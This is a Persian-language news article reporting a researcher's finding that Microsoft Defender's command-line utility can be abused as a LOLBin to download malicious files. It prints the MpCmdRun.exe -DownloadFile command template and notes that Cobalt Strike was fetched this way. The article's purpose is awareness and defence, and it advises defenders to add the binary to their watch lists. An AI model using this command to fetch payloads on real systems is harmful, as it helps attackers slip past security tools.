فهرست بستن

آنتی ویروس ویندوز ۱۰ می‌تواند بدافزار دانلود کند

به گفته یکی از محققان امنیتی به‌روزرسانی جدید مایکروسافت دیفندر این نرم افزار را به ابزار دانلود فایل‌های مخرب از اینترنت تبدیل کرده است.

یک محقق امنیتی به نام Mohammad Askar می‌گوید تغییرات در ابزار Command Line مایکروسافت دیفندر به هکرها اجازه می‌دهد تا از این آنتی ویروس به عنوان LOLBin استفاده کنند. به آن دسته از فایل‌های معتبر سیستم عامل که می‌توان از آنها برای اهداف خرابکارانه استفاده کرد، LOLBin گفته می‌شود.

LOLBINها در ویندوز ۱۰ وجود داشته و هر کدام از آنها عملکرد غیرخرابکارانه دارند، اما هکرها با دسترسی غیرمجاز می‌توانند از این فایل‌ها برای دور زدن سپرهای امنیتی و حمله به کامپیوتر بدون اطلاع کاربر استفاده کنند.

آنطور که Askar می‌گوید، ابزار Command Line مایکروسافت دیفندر حالا از دستور جدیدی به نام DownloadFile- پشتیبانی می‌کند. این تغییر احتمالاً در نسخه 4.18.2007.9 یا 4.18.2009.9 این نرم افزار رخ داده است.

هکرها با نفوذ به شبکه محلی می‌توانند با استفاده از ابزار Microsoft Antimalware Service Command Line Utility و دستور زیر فایل مخرب را دانلود کنند:

<MpCmdRun.exe -DownloadFile -url -path <local-path

محقق امنیتی یاد شده با استفاده از این تکنیک بدافزاری به نام Cobalt Strike را مستقیماً بوسیله مایکروسافت دیفندر دانلود کرد.

دیفندر قادر به شناسایی و حذف فایل‌های مخرب دانلود شده با استفاده از این روش است، اما مشخص نیست دیگر نرم افزارهای آنتی ویروس نیز قادر به دفاع از سیستم در برابر فایل‌های مخرب دانلود شده از این روش هستند یا خیر. به متخصصین شبکه توصیه می‌شود تا این LOLBin را در لیست خود قرار دهند تا از حمله احتمالی جلوگیری شود.

Let’s block ads! (Why?)

لینک منبع

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *